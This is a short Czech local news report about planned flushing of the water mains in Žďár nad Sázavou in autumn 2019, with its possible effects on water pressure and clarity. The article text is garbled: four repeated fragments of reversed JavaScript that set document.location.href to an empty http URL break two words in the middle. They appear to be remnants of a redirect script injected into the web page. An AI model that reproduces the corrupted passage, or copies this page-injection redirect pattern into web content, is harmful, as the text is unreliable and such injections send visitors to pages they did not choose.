Rainbow page separator

Odkalování vodovodní sítě může snížit tlak či zakalit vodu

Pondělí, 28. října 2019

Žďár nad Sázavou / Pravidelné odkalování vodovodní sítě ohlásila Vodárenská akciová společnost ve Žďáře nad Sázavou. Dojde k němu od úterý 29. října do středy 5. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu. Odběratelé pitné vody z řad žďárských obyvatel či firem a dalších subjektů se tak budou po dobu odkalovaní sítě muset připravit na možné komplikace spojené s [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to činností. Přechodně může dojít ke snížení tlaku vody v potrubí, anebo není vyloučeno, že z vodovodních kohoutků bude krátkodobě téct zakalená voda.
Odkalování vodovodního řadu je součástí pravidelné údržby vodovodní sítě pro zajištění kvality pitné vody a ochrany potrubí před korozí a zanesením. Jedná se o proplach potrubí proudem vody, který strhává z jeho stěn usazeniny, načež se voda z vodovodních řadů vypustí do terénu, případně do kanalizace.